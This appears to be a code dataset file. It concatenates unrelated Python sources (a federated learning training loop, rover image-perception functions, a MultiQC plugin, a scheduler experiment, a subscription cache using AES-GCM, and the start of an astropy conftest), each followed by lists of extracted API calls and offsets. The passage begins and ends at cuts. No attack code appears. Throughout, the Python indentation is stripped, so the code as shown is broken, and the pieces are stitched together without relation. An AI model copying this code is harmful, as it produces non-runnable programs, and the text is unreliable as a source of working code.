host_gradient = self.gradient_operator.compute_gradient(batch_feat_inst, fore_gradient,
fit_intercept=False)
# regulation if necessary
if self.updater is not None:
loss_regular = self.updater.loss_norm(self.coef_)
en_loss_regular = self.encrypt_operator.encrypt(loss_regular)
federation.remote(en_loss_regular,
name=self.transfer_variable.host_loss_regular.name,
tag=self.transfer_variable.generate_transferid(
self.transfer_variable.host_loss_regular,
self.n_iter_,
batch_index),
role=consts.GUEST,
idx=0)
LOGGER.info("Remote host_loss_regular to guest")
federation.remote(host_gradient,
name=self.transfer_variable.host_gradient.name,
tag=self.transfer_variable.generate_transferid(self.transfer_variable.host_gradient,
self.n_iter_,
batch_index),
role=consts.ARBITER,
idx=0)
LOGGER.info("Remote host_gradient to arbiter")
# Get optimize host gradient and update model
optim_host_gradient = federation.get(name=self.transfer_variable.host_optim_gradient.name,
tag=self.transfer_variable.generate_transferid(
self.transfer_variable.host_optim_gradient, self.n_iter_,
batch_index),
idx=0)
LOGGER.info("Get optim_host_gradient from arbiter")
LOGGER.info("update_model")
self.update_model(optim_host_gradient)
# update local model that transforms features of raw input 'batch_data_inst'
training_info = {"iteration": self.n_iter_, "batch_index": batch_index}
self.update_local_model(fore_gradient, batch_data_inst, self.coef_, **training_info)
batch_index += 1
# temporary resource recovery and will be removed in the future
rubbish_list = [host_forward,
fore_gradient
]
data_overview.rubbish_clear(rubbish_list)
is_stopped = federation.get(name=self.transfer_variable.is_stopped.name,
tag=self.transfer_variable.generate_transferid(
self.transfer_variable.is_stopped, self.n_iter_, batch_index),
idx=0)
LOGGER.info("Get is_stop flag from arbiter:{}".format(is_stopped))
self.n_iter_ += 1
if is_stopped:
LOGGER.info("Get stop signal from arbiter, model is converged, iter:{}".format(self.n_iter_))
break
LOGGER.info("Reach max iter {}, train model finish!".format(self.max_iter))
def predict(self, data_instances):
"""
Prediction of lr
Parameters
----------
data_instances:DTable of Instance, input data
"""
LOGGER.info("Start predict ...")
data_features = self.transform(data_instances)
prob_host = self.compute_wx(data_features, self.coef_, self.intercept_)
federation.remote(prob_host,
name=self.transfer_variable.host_prob.name,
tag=self.transfer_variable.generate_transferid(
self.transfer_variable.host_prob),
role=consts.GUEST,
idx=0)
LOGGER.info("Remote probability to Guest")
|
[
"arch.api.utils.log_utils.getLogger",
"numpy.square",
"federatedml.statistic.data_overview.rubbish_clear",
"federatedml.optim.gradient.HeteroLogisticGradient",
"federatedml.secureprotol.EncryptModeCalculator"
] |
[((1082, 1103), 'arch.api.utils.log_utils.getLogger', 'log_utils.getLogger', ([], {}), '()\n', (1101, 1103), False, 'from arch.api.utils import log_utils\n'), ((2325, 2352), 'federatedml.statistic.data_overview.rubbish_clear', 'rubbish_clear', (['rubbish_list'], {}), '(rubbish_list)\n', (2338, 2352), False, 'from federatedml.statistic.data_overview import rubbish_clear\n'), ((3846, 3999), 'federatedml.secureprotol.EncryptModeCalculator', 'EncryptModeCalculator', (['self.encrypt_operator', 'self.encrypted_mode_calculator_param.mode', 'self.encrypted_mode_calculator_param.re_encrypted_rate'], {}), '(self.encrypt_operator, self.\n encrypted_mode_calculator_param.mode, self.\n encrypted_mode_calculator_param.re_encrypted_rate)\n', (3867, 3999), False, 'from federatedml.secureprotol import EncryptModeCalculator\n'), ((1904, 1916), 'numpy.square', 'np.square', (['v'], {}), '(v)\n', (1913, 1916), True, 'import numpy as np\n'), ((10424, 10465), 'federatedml.statistic.data_overview.rubbish_clear', 'data_overview.rubbish_clear', (['rubbish_list'], {}), '(rubbish_list)\n', (10451, 10465), False, 'from federatedml.statistic import data_overview\n'), ((7519, 7564), 'federatedml.optim.gradient.HeteroLogisticGradient', 'HeteroLogisticGradient', (['self.encrypt_operator'], {}), '(self.encrypt_operator)\n', (7541, 7564), False, 'from federatedml.optim.gradient import HeteroLogisticGradient\n')]
|
import numpy as np
import cv2
# Identify pixels above the threshold
# Threshold of RGB > 160 does a nice job of identifying ground pixels only
def color_thresh(img, rgb_thresh=(160, 160, 160),above = True):
# Create an array of zeros same xy size as img, but single channel
color_select = np.zeros_like(img[:,:,0])
# Require that each pixel be above all three threshold values in RGB
# above_thresh will now contain a boolean array with "True"
# where threshold was met
above_thresh = (img[:,:,0] > rgb_thresh[0]) \
& (img[:,:,1] > rgb_thresh[1]) \
& (img[:,:,2] > rgb_thresh[2])
below_thresh = (img[:,:,0] < rgb_thresh[0]) \
& (img[:,:,1] < rgb_thresh[1]) \
& (img[:,:,2] < rgb_thresh[2])
# Index the array of zeros with the boolean array and set to 1
if above:
color_select[above_thresh] = 1
else:
color_select[below_thresh] = 1
# Return the binary image
return color_select
# Identify pixels within a range of threshold
# Threshold of RGB > 160 does a nice job of identifying ground pixels only
def color_thresh_range(img, rgb_thresh_max=(255, 255, 80), rgb_thresh_min=(140, 110, 0)):
# Create an array of zeros same xy size as img, but single channel
color_select = np.zeros_like(img[:,:,0])
# Require that each pixel be above all three threshold values in RGB
# above_thresh will now contain a boolean array with "True"
# where threshold was met
thresh = (img[:,:,0] > rgb_thresh_min[0]) \
& (img[:,:,1] > rgb_thresh_min[1]) \
& (img[:,:,2] > rgb_thresh_min[2]) \
& (img[:,:,0] < rgb_thresh_max[0]) \
& (img[:,:,1] < rgb_thresh_max[1]) \
& (img[:,:,2] < rgb_thresh_max[2])
# Index the array of zeros with the boolean array and set to 1
color_select[thresh] = 1
# Return the binary image
return color_select
# Define a function to convert from image coords to rover coords
def rover_coords(binary_img):
# Identify nonzero pixels
ypos, xpos = binary_img.nonzero()
# Calculate pixel positions with reference to the rover position being at the
# center bottom of the image.
x_pixel = -(ypos - binary_img.shape[0]).astype(np.float)
y_pixel = -(xpos - binary_img.shape[1]/2 ).astype(np.float)
return x_pixel, y_pixel
# Define a function to convert to radial coords in rover space
def to_polar_coords(x_pixel, y_pixel):
# Convert (x_pixel, y_pixel) to (distance, angle)
# in polar coordinates in rover space
# Calculate distance to each pixel
dist = np.sqrt(x_pixel**2 + y_pixel**2)
# Calculate angle away from vertical for each pixel
angles = np.arctan2(y_pixel, x_pixel)
return dist, angles
# Define a function to map rover space pixels to world space
def rotate_pix(xpix, ypix, yaw):
# Convert yaw to radians
yaw_rad = yaw * np.pi / 180
xpix_rotated = (xpix * np.cos(yaw_rad)) - (ypix * np.sin(yaw_rad))
ypix_rotated = (xpix * np.sin(yaw_rad)) + (ypix * np.cos(yaw_rad))
# Return the result
return xpix_rotated, ypix_rotated
def translate_pix(xpix_rot, ypix_rot, xpos, ypos, scale):
# Apply a scaling and a translation
xpix_translated = (xpix_rot / scale) + xpos
ypix_translated = (ypix_rot / scale) + ypos
# Return the result
return xpix_translated, ypix_translated
# Define a function to apply rotation and translation (and clipping)
# Once you define the two functions above this function should work
def pix_to_world(xpix, ypix, xpos, ypos, yaw, world_size, scale):
# Apply rotation
xpix_rot, ypix_rot = rotate_pix(xpix, ypix, yaw)
# Apply translation
xpix_tran, ypix_tran = translate_pix(xpix_rot, ypix_rot, xpos, ypos, scale)
# Perform rotation, translation and clipping all at once
x_pix_world = np.clip(np.int_(xpix_tran), 0, world_size - 1)
y_pix_world = np.clip(np.int_(ypix_tran), 0, world_size - 1)
# Return the result
return x_pix_world, y_pix_world
def get_sub_global_map(xpos, ypos, yaw, world_map, world_size, global_scale):
# Apply rotation
xpix = np.tile(np.arange(global_scale),global_scale)
ypix = np.repeat(np.arange(global_scale)-global_scale/2, global_scale)
xpix_rot, ypix_rot = rotate_pix(xpix, ypix, yaw)
# Apply translation
xpix_tran, ypix_tran = translate_pix(xpix_rot, ypix_rot, xpos, ypos, 1)
# Perform rotation, translation and clipping all at once
x_pix_world = np.clip(np.int_(xpix_tran), 0, world_size - 1)
y_pix_world = np.clip(np.int_(ypix_tran), 0, world_size - 1)
weights = world_map[y_pix_world, x_pix_world,:]
# Return the result
return xpix, ypix, weights
# Define a function to perform a perspective transform
def perspect_transform(img, src, dst):
M = cv2.getPerspectiveTransform(src, dst)
warped = cv2.warpPerspective(img, M, (img.shape[1], img.shape[0]))# keep same size as input image
return warped
# Apply the above functions in succession and update the Rover state accordingly
def perception_step(Rover):
# Perform perception steps to update Rover()
# TODO:
# NOTE: camera image is coming to you in Rover.img
img = Rover.img
# 1) Define source and destination points for perspective transform
source = np.float32([[14, 140], [301 ,140],[200, 96], [118, 96]])
dst_size = 5
bottom_offset = 6
destination = np.float32([[img.shape[1]/2 - dst_size, img.shape[0] - bottom_offset],
[img.shape[1]/2 + dst_size, img.shape[0] - bottom_offset],
[img.shape[1]/2 + dst_size, img.shape[0] - 2*dst_size - bottom_offset],
[img.shape[1]/2 - dst_size, img.shape[0] - 2*dst_size - bottom_offset],
])
# 2) Apply perspective transform
warped = perspect_transform(img, source, destination)
# 3) Apply color threshold to identify navigable terrain/obstacles/rock samples
threshed = color_thresh(warped)
# 4) Update Rover.vision_image (this will be displayed on left side of screen)
# Example: Rover.vision_image[:,:,0] = obstacle color-thresholded binary image
# Rover.vision_image[:,:,1] = rock_sample color-thresholded binary image
# Rover.vision_image[:,:,2] = navigable terrain color-thresholded binary image
Rover.vision_image[:,:, 0] = threshed
# 5) Convert map image pixel values to rover-centric coords
xpix, ypix = rover_coords(threshed)
# 6) Convert rover-centric pixel values to world coordinates
xpos = Rover.pos[0]
ypos = Rover.pos[1]
yaw = Rover.yaw
world_size = 200
scale = 10
x_pix_world, y_pix_world = pix_to_world(xpix, ypix, xpos, ypos, yaw, world_size, scale)
# 7) Update Rover worldmap (to be displayed on right side of screen)
# Example: Rover.worldmap[obstacle_y_world, obstacle_x_world, 0] += 1
# Rover.worldmap[rock_y_world, rock_x_world, 1] += 1
# Rover.worldmap[navigable_y_world, navigable_x_world, 2] += 1
Rover.worldmap[y_pix_world, x_pix_world, 2] = np.clip(Rover.worldmap[y_pix_world, x_pix_world, 2]+1,0,255)
threshed = color_thresh(warped, above = False)
xpix_obs, ypix_obs = rover_coords(threshed)
x_pix_world_obs, y_pix_world_obs = pix_to_world(xpix_obs, ypix_obs, xpos, ypos, yaw, world_size, scale)
Rover.worldmap[y_pix_world_obs, x_pix_world_obs, 0] = np.clip(Rover.worldmap[y_pix_world_obs, x_pix_world_obs, 0]+1,0,255)
threshed = color_thresh_range(warped)
xpix_rock, ypix_rock = rover_coords(threshed)
x_pix_world_rock, y_pix_world_rock = pix_to_world(xpix_rock, ypix_rock, xpos, ypos, yaw, world_size, scale)
Rover.worldmap[y_pix_world_rock, x_pix_world_rock, 1] = np.clip(Rover.worldmap[y_pix_world_rock, x_pix_world_rock, 1]+1,0,255)
# 8) Convert rover-centric pixel positions to polar coordinates
# Update Rover pixel distances and angles
# Rover.nav_dists = rover_centric_pixel_distances
# Rover.nav_angles = rover_centric_angles
dist, angles = to_polar_coords(xpix, ypix)
Rover.nav_dists = dist
Rover.nav_angles = angles
global_scale = 30
xpix_sub_global, ypix_sub_global, weights_sub_global = get_sub_global_map(xpos, ypos, yaw, Rover.worldmap, world_size, global_scale)
sub_global_map = weights_sub_global.reshape((global_scale,global_scale,3))
dis_sub_global, angles_sub_global = to_polar_coords(xpix_sub_global, ypix_sub_global)
weights_sub_global = (255-np.abs(weights_sub_global[:,0]+weights_sub_global[:,2]))/255
weights_sub_global[weights_sub_global<0.95] = 0
if np.mean(weights_sub_global) == 0:
mean_dir_sub_global = 0
elif np.mean(weights_sub_global) > 1:
mean_dir_sub_global = 0
else:
mean_dir_sub_global = np.sum(np.multiply(angles_sub_global,weights_sub_global))/np.sum(weights_sub_global)
Rover.dir_global = mean_dir_sub_global
return Rover
|
[
"cv2.warpPerspective",
"numpy.zeros_like",
"numpy.arctan2",
"numpy.int_",
"numpy.abs",
"numpy.sum",
"cv2.getPerspectiveTransform",
"numpy.multiply",
"numpy.float32",
"numpy.clip",
"numpy.mean",
"numpy.arange",
"numpy.sin",
"numpy.cos",
"numpy.sqrt"
] |
[((298, 325), 'numpy.zeros_like', 'np.zeros_like', (['img[:, :, 0]'], {}), '(img[:, :, 0])\n', (311, 325), True, 'import numpy as np\n'), ((1314, 1341), 'numpy.zeros_like', 'np.zeros_like', (['img[:, :, 0]'], {}), '(img[:, :, 0])\n', (1327, 1341), True, 'import numpy as np\n'), ((2660, 2696), 'numpy.sqrt', 'np.sqrt', (['(x_pixel ** 2 + y_pixel ** 2)'], {}), '(x_pixel ** 2 + y_pixel ** 2)\n', (2667, 2696), True, 'import numpy as np\n'), ((2762, 2790), 'numpy.arctan2', 'np.arctan2', (['y_pixel', 'x_pixel'], {}), '(y_pixel, x_pixel)\n', (2772, 2790), True, 'import numpy as np\n'), ((4916, 4953), 'cv2.getPerspectiveTransform', 'cv2.getPerspectiveTransform', (['src', 'dst'], {}), '(src, dst)\n', (4943, 4953), False, 'import cv2\n'), ((4967, 5024), 'cv2.warpPerspective', 'cv2.warpPerspective', (['img', 'M', '(img.shape[1], img.shape[0])'], {}), '(img, M, (img.shape[1], img.shape[0]))\n', (4986, 5024), False, 'import cv2\n'), ((5412, 5469), 'numpy.float32', 'np.float32', (['[[14, 140], [301, 140], [200, 96], [118, 96]]'], {}), '([[14, 140], [301, 140], [200, 96], [118, 96]])\n', (5422, 5469), True, 'import numpy as np\n'), ((5527, 5828), 'numpy.float32', 'np.float32', (['[[img.shape[1] / 2 - dst_size, img.shape[0] - bottom_offset], [img.shape[1] /\n 2 + dst_size, img.shape[0] - bottom_offset], [img.shape[1] / 2 +\n dst_size, img.shape[0] - 2 * dst_size - bottom_offset], [img.shape[1] /\n 2 - dst_size, img.shape[0] - 2 * dst_size - bottom_offset]]'], {}), '([[img.shape[1] / 2 - dst_size, img.shape[0] - bottom_offset], [\n img.shape[1] / 2 + dst_size, img.shape[0] - bottom_offset], [img.shape[\n 1] / 2 + dst_size, img.shape[0] - 2 * dst_size - bottom_offset], [img.\n shape[1] / 2 - dst_size, img.shape[0] - 2 * dst_size - bottom_offset]])\n', (5537, 5828), True, 'import numpy as np\n'), ((7211, 7275), 'numpy.clip', 'np.clip', (['(Rover.worldmap[y_pix_world, x_pix_world, 2] + 1)', '(0)', '(255)'], {}), '(Rover.worldmap[y_pix_world, x_pix_world, 2] + 1, 0, 255)\n', (7218, 7275), True, 'import numpy as np\n'), ((7538, 7610), 'numpy.clip', 'np.clip', (['(Rover.worldmap[y_pix_world_obs, x_pix_world_obs, 0] + 1)', '(0)', '(255)'], {}), '(Rover.worldmap[y_pix_world_obs, x_pix_world_obs, 0] + 1, 0, 255)\n', (7545, 7610), True, 'import numpy as np\n'), ((7876, 7950), 'numpy.clip', 'np.clip', (['(Rover.worldmap[y_pix_world_rock, x_pix_world_rock, 1] + 1)', '(0)', '(255)'], {}), '(Rover.worldmap[y_pix_world_rock, x_pix_world_rock, 1] + 1, 0, 255)\n', (7883, 7950), True, 'import numpy as np\n'), ((3942, 3960), 'numpy.int_', 'np.int_', (['xpix_tran'], {}), '(xpix_tran)\n', (3949, 3960), True, 'import numpy as np\n'), ((4007, 4025), 'numpy.int_', 'np.int_', (['ypix_tran'], {}), '(ypix_tran)\n', (4014, 4025), True, 'import numpy as np\n'), ((4225, 4248), 'numpy.arange', 'np.arange', (['global_scale'], {}), '(global_scale)\n', (4234, 4248), True, 'import numpy as np\n'), ((4583, 4601), 'numpy.int_', 'np.int_', (['xpix_tran'], {}), '(xpix_tran)\n', (4590, 4601), True, 'import numpy as np\n'), ((4648, 4666), 'numpy.int_', 'np.int_', (['ypix_tran'], {}), '(ypix_tran)\n', (4655, 4666), True, 'import numpy as np\n'), ((8768, 8795), 'numpy.mean', 'np.mean', (['weights_sub_global'], {}), '(weights_sub_global)\n', (8775, 8795), True, 'import numpy as np\n'), ((2998, 3013), 'numpy.cos', 'np.cos', (['yaw_rad'], {}), '(yaw_rad)\n', (3004, 3013), True, 'import numpy as np\n'), ((3025, 3040), 'numpy.sin', 'np.sin', (['yaw_rad'], {}), '(yaw_rad)\n', (3031, 3040), True, 'import numpy as np\n'), ((3098, 3113), 'numpy.sin', 'np.sin', (['yaw_rad'], {}), '(yaw_rad)\n', (3104, 3113), True, 'import numpy as np\n'), ((3125, 3140), 'numpy.cos', 'np.cos', (['yaw_rad'], {}), '(yaw_rad)\n', (3131, 3140), True, 'import numpy as np\n'), ((4284, 4307), 'numpy.arange', 'np.arange', (['global_scale'], {}), '(global_scale)\n', (4293, 4307), True, 'import numpy as np\n'), ((8647, 8706), 'numpy.abs', 'np.abs', (['(weights_sub_global[:, 0] + weights_sub_global[:, 2])'], {}), '(weights_sub_global[:, 0] + weights_sub_global[:, 2])\n', (8653, 8706), True, 'import numpy as np\n'), ((8843, 8870), 'numpy.mean', 'np.mean', (['weights_sub_global'], {}), '(weights_sub_global)\n', (8850, 8870), True, 'import numpy as np\n'), ((9006, 9032), 'numpy.sum', 'np.sum', (['weights_sub_global'], {}), '(weights_sub_global)\n', (9012, 9032), True, 'import numpy as np\n'), ((8955, 9005), 'numpy.multiply', 'np.multiply', (['angles_sub_global', 'weights_sub_global'], {}), '(angles_sub_global, weights_sub_global)\n', (8966, 9005), True, 'import numpy as np\n')]
|
#!/usr/bin/env python3
"""
NPMExtraMetrics module
"""
from __future__ import print_function
import logging
from multiqc.utils import config
from multiqc.modules.base_module import BaseMultiqcModule
from . import npm_picard_QualityYieldMetrics
from . import npm_samtools_stats_bq
from . import npm_bcftools_gtcheck
from . import npm_sg10k_cov_062017
from . import npm_count_variants
from . import npm_mosdepth
log = logging.getLogger('multiqc')
class NPMExtraMetrics(BaseMultiqcModule):
def __init__(self):
# Halt execution if we've disabled the plugin
if config.kwargs.get('enable_plugin', False) is True \
or getattr(config, 'enable_plugin', False) is True:
log.info("Running with MultiQC NPM plugin")
else:
log.info("Skipping MultiQC NPM plugin as not enabled")
return None
# Initialise the parent module Class object
super(NPMExtraMetrics, self).__init__(
name='NPMExtraMetrics',
anchor='npm_extra_metrics'
)
# Call each submodule and report progress
n = dict()
n['npm_picard_QualityYieldMetrics'] = npm_picard_QualityYieldMetrics.parse_reports(self)
if n['npm_picard_QualityYieldMetrics'] > 0:
log.info("Found %d npm_picard_QualityYieldMetrics reports" % n['npm_picard_QualityYieldMetrics'])
n['npm_samtools_stats_bq'] = npm_samtools_stats_bq.parse_reports(self)
if n['npm_samtools_stats_bq'] > 0:
log.info("Found %d npm_samtools_stats_bq reports" % n['npm_samtools_stats_bq'])
n['npm_bcftools_gtcheck'] = npm_bcftools_gtcheck.parse_reports(self)
if n['npm_bcftools_gtcheck'] > 0:
log.info("Found %d npm_bcftools_gtcheck reports" % n['npm_bcftools_gtcheck'])
n['npm_sg10k_cov_062017'] = npm_sg10k_cov_062017.parse_reports(self)
if n['npm_sg10k_cov_062017'] > 0:
log.info("Found %d npm_sg10k_cov_062017 reports" % n['npm_sg10k_cov_062017'])
n['npm_count_variants'] = npm_count_variants.parse_reports(self)
if n['npm_count_variants'] > 0:
log.info("Found %d npm_count_variants reports" % n['npm_count_variants'])
n['npm_mosdepth'] = npm_mosdepth.parse_reports(self)
if n['npm_mosdepth'] > 0:
log.info("Found %d npm_mosdepth reports" % n['npm_mosdepth'])
# Exit if we didn't find anything
if sum(n.values()) == 0:
raise UserWarning
|
[
"multiqc.utils.config.kwargs.get",
"logging.getLogger"
] |
[((420, 448), 'logging.getLogger', 'logging.getLogger', (['"""multiqc"""'], {}), "('multiqc')\n", (437, 448), False, 'import logging\n'), ((584, 625), 'multiqc.utils.config.kwargs.get', 'config.kwargs.get', (['"""enable_plugin"""', '(False)'], {}), "('enable_plugin', False)\n", (601, 625), False, 'from multiqc.utils import config\n')]
|
from timeit import timeit
from sijuiacion_lang.lowering import sij, Lower
defun = sij.Defun("", "", [], "", ["argf"], [
sij.Load("argf"),
sij.Label("loop"),
sij.Unpack(2),
sij.Call(1),
sij.Unpack(2),
sij.GotoNEq("loop"),
sij.Return()
])
code, _ = Lower({}).lower("", "", 1, "", [], [], [defun, sij.Return()])
scheduler = eval(code)
print(scheduler)
def schd(f, arg):
while True:
token, a = f(arg)
if token:
return a
f, arg = a
#
#
def rec1(x):
if x is 0:
return 0
return rec1(x - 1) + x
#
#
def rec2(x):
def apply(y):
if x is 0:
return True, y
return False, (x + y, scheduler((x - 1, rec2)))
return True, apply
import dis
dis.show_code(scheduler)
dis.show_code(schd)
#
#
# print(scheduler((0, scheduler((500, rec2)))))
print(timeit('rec1(500)', globals=globals(), number=500))
print(
timeit('scheduler((0, scheduler((500, rec2))))',
globals=globals(),
number=500))
|
[
"sijuiacion_lang.lowering.sij.Call",
"sijuiacion_lang.lowering.sij.Return",
"sijuiacion_lang.lowering.sij.Load",
"sijuiacion_lang.lowering.sij.GotoNEq",
"sijuiacion_lang.lowering.sij.Label",
"sijuiacion_lang.lowering.Lower",
"dis.show_code",
"sijuiacion_lang.lowering.sij.Unpack"
] |
[((754, 778), 'dis.show_code', 'dis.show_code', (['scheduler'], {}), '(scheduler)\n', (767, 778), False, 'import dis\n'), ((779, 798), 'dis.show_code', 'dis.show_code', (['schd'], {}), '(schd)\n', (792, 798), False, 'import dis\n'), ((125, 141), 'sijuiacion_lang.lowering.sij.Load', 'sij.Load', (['"""argf"""'], {}), "('argf')\n", (133, 141), False, 'from sijuiacion_lang.lowering import sij, Lower\n'), ((147, 164), 'sijuiacion_lang.lowering.sij.Label', 'sij.Label', (['"""loop"""'], {}), "('loop')\n", (156, 164), False, 'from sijuiacion_lang.lowering import sij, Lower\n'), ((170, 183), 'sijuiacion_lang.lowering.sij.Unpack', 'sij.Unpack', (['(2)'], {}), '(2)\n', (180, 183), False, 'from sijuiacion_lang.lowering import sij, Lower\n'), ((189, 200), 'sijuiacion_lang.lowering.sij.Call', 'sij.Call', (['(1)'], {}), '(1)\n', (197, 200), False, 'from sijuiacion_lang.lowering import sij, Lower\n'), ((206, 219), 'sijuiacion_lang.lowering.sij.Unpack', 'sij.Unpack', (['(2)'], {}), '(2)\n', (216, 219), False, 'from sijuiacion_lang.lowering import sij, Lower\n'), ((225, 244), 'sijuiacion_lang.lowering.sij.GotoNEq', 'sij.GotoNEq', (['"""loop"""'], {}), "('loop')\n", (236, 244), False, 'from sijuiacion_lang.lowering import sij, Lower\n'), ((250, 262), 'sijuiacion_lang.lowering.sij.Return', 'sij.Return', ([], {}), '()\n', (260, 262), False, 'from sijuiacion_lang.lowering import sij, Lower\n'), ((277, 286), 'sijuiacion_lang.lowering.Lower', 'Lower', (['{}'], {}), '({})\n', (282, 286), False, 'from sijuiacion_lang.lowering import sij, Lower\n'), ((324, 336), 'sijuiacion_lang.lowering.sij.Return', 'sij.Return', ([], {}), '()\n', (334, 336), False, 'from sijuiacion_lang.lowering import sij, Lower\n')]
|
# -*- encoding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import binascii
import json
import os
import cryptography
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import ciphers
from cryptography.hazmat.primitives import hashes
import daiquiri
import requests
from mergify_engine import config
LOG = daiquiri.getLogger(__name__)
digest = hashes.Hash(hashes.SHA256(), backend=default_backend())
digest.update(config.CACHE_TOKEN_SECRET.encode())
SECRET_KEY = digest.finalize()
IV_BYTES_NEEDED = 12
BLOCK_SIZE = 16
TAG_SIZE_BYTES = BLOCK_SIZE
def _encrypt(sub):
value = json.dumps(sub).encode()
iv = os.urandom(IV_BYTES_NEEDED)
cipher = ciphers.Cipher(
ciphers.algorithms.AES(SECRET_KEY),
ciphers.modes.GCM(iv),
backend=default_backend()
)
encryptor = cipher.encryptor()
encrypted = encryptor.update(value) + encryptor.finalize()
encrypted = base64.b64encode(iv + encryptor.tag + encrypted)
return encrypted
def _decrypt(value):
try:
decrypted = base64.b64decode(value)
except binascii.Error:
LOG.error("Invalid encrypted token: invalid base64")
return
if len(decrypted) < IV_BYTES_NEEDED + TAG_SIZE_BYTES:
LOG.error("Invalid encrypted token: size check failure")
return
iv = decrypted[:IV_BYTES_NEEDED]
tag = decrypted[IV_BYTES_NEEDED: IV_BYTES_NEEDED + TAG_SIZE_BYTES]
decrypted = decrypted[IV_BYTES_NEEDED + TAG_SIZE_BYTES:]
cipher = ciphers.Cipher(
ciphers.algorithms.AES(SECRET_KEY),
ciphers.modes.GCM(iv, tag),
backend=default_backend()
)
decryptor = cipher.decryptor()
try:
decrypted = decryptor.update(decrypted) + decryptor.finalize()
except cryptography.exceptions.InvalidTag:
LOG.error("Invalid encrypted token: decryptor() failure")
return
try:
decrypted = decrypted.decode()
except UnicodeDecodeError:
LOG.error("Invalid encrypted token: decode() failure")
return
try:
return json.loads(decrypted)
except json.JSONDecodeError:
LOG.error("Invalid encrypted token: json.load() failure")
return
def _retrieve_subscription_from_db(installation_id):
LOG.debug("Subscription not cached, retrieving it...",
install_id=installation_id)
resp = requests.get(config.SUBSCRIPTION_URL %
installation_id,
auth=(config.OAUTH_CLIENT_ID,
config.OAUTH_CLIENT_SECRET))
if resp.status_code == 404:
sub = {
"token": None,
"subscribed": False
}
elif resp.status_code == 200:
sub = resp.json()
sub["subscribed"] = sub["subscription"] is not None
sub["token"] = sub["token"]["access_token"]
del sub["subscription"]
else: # pragma: no cover
# NOTE(sileht): handle this better
resp.raise_for_status()
return sub
def _retrieve_subscription_from_cache(r, installation_id):
encrypted_sub = r.get("subscription-cache-%s" % installation_id)
if encrypted_sub:
return _decrypt(encrypted_sub)
def _save_subscription_to_cache(r, installation_id, sub):
encrypted = _encrypt(sub)
r.set("subscription-cache-%s" % installation_id, encrypted, ex=3600)
def get_subscription(r, installation_id):
sub = _retrieve_subscription_from_cache(r, installation_id)
if not sub:
sub = _retrieve_subscription_from_db(installation_id)
_save_subscription_to_cache(r, installation_id, sub)
return sub
|
[
"json.loads",
"cryptography.hazmat.primitives.hashes.SHA256",
"cryptography.hazmat.primitives.ciphers.algorithms.AES",
"base64.b64decode",
"json.dumps",
"cryptography.hazmat.primitives.ciphers.modes.GCM",
"mergify_engine.config.CACHE_TOKEN_SECRET.encode",
"base64.b64encode",
"requests.get",
"daiquiri.getLogger",
"cryptography.hazmat.backends.default_backend",
"os.urandom"
] |
[((882, 910), 'daiquiri.getLogger', 'daiquiri.getLogger', (['__name__'], {}), '(__name__)\n', (900, 910), False, 'import daiquiri\n'), ((933, 948), 'cryptography.hazmat.primitives.hashes.SHA256', 'hashes.SHA256', ([], {}), '()\n', (946, 948), False, 'from cryptography.hazmat.primitives import hashes\n'), ((991, 1025), 'mergify_engine.config.CACHE_TOKEN_SECRET.encode', 'config.CACHE_TOKEN_SECRET.encode', ([], {}), '()\n', (1023, 1025), False, 'from mergify_engine import config\n'), ((1191, 1218), 'os.urandom', 'os.urandom', (['IV_BYTES_NEEDED'], {}), '(IV_BYTES_NEEDED)\n', (1201, 1218), False, 'import os\n'), ((1477, 1525), 'base64.b64encode', 'base64.b64encode', (['(iv + encryptor.tag + encrypted)'], {}), '(iv + encryptor.tag + encrypted)\n', (1493, 1525), False, 'import base64\n'), ((2913, 3032), 'requests.get', 'requests.get', (['(config.SUBSCRIPTION_URL % installation_id)'], {'auth': '(config.OAUTH_CLIENT_ID, config.OAUTH_CLIENT_SECRET)'}), '(config.SUBSCRIPTION_URL % installation_id, auth=(config.\n OAUTH_CLIENT_ID, config.OAUTH_CLIENT_SECRET))\n', (2925, 3032), False, 'import requests\n'), ((958, 975), 'cryptography.hazmat.backends.default_backend', 'default_backend', ([], {}), '()\n', (973, 975), False, 'from cryptography.hazmat.backends import default_backend\n'), ((1256, 1290), 'cryptography.hazmat.primitives.ciphers.algorithms.AES', 'ciphers.algorithms.AES', (['SECRET_KEY'], {}), '(SECRET_KEY)\n', (1278, 1290), False, 'from cryptography.hazmat.primitives import ciphers\n'), ((1300, 1321), 'cryptography.hazmat.primitives.ciphers.modes.GCM', 'ciphers.modes.GCM', (['iv'], {}), '(iv)\n', (1317, 1321), False, 'from cryptography.hazmat.primitives import ciphers\n'), ((1599, 1622), 'base64.b64decode', 'base64.b64decode', (['value'], {}), '(value)\n', (1615, 1622), False, 'import base64\n'), ((2072, 2106), 'cryptography.hazmat.primitives.ciphers.algorithms.AES', 'ciphers.algorithms.AES', (['SECRET_KEY'], {}), '(SECRET_KEY)\n', (2094, 2106), False, 'from cryptography.hazmat.primitives import ciphers\n'), ((2116, 2142), 'cryptography.hazmat.primitives.ciphers.modes.GCM', 'ciphers.modes.GCM', (['iv', 'tag'], {}), '(iv, tag)\n', (2133, 2142), False, 'from cryptography.hazmat.primitives import ciphers\n'), ((2610, 2631), 'json.loads', 'json.loads', (['decrypted'], {}), '(decrypted)\n', (2620, 2631), False, 'import json\n'), ((1157, 1172), 'json.dumps', 'json.dumps', (['sub'], {}), '(sub)\n', (1167, 1172), False, 'import json\n'), ((1339, 1356), 'cryptography.hazmat.backends.default_backend', 'default_backend', ([], {}), '()\n', (1354, 1356), False, 'from cryptography.hazmat.backends import default_backend\n'), ((2160, 2177), 'cryptography.hazmat.backends.default_backend', 'default_backend', ([], {}), '()\n', (2175, 2177), False, 'from cryptography.hazmat.backends import default_backend\n')]
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Configure the tests for :mod:`astropy.cosmology`."""
##############################################################################
# IMPORTS
# STDLIB
import inspect
import json
import os
# THIRD-PARTY
import pytest
# LOCAL
import astropy.cosmology.units as cu
import astropy.units as u
from astropy.cosmology import core
from astropy.cosmology.core import Cosmology
from astropy.tests.helper import pickle_protocol
###############################################################################
# FUNCTIONS
def get_redshift_methods(cosmology, allow_private=True, allow_z2=True):
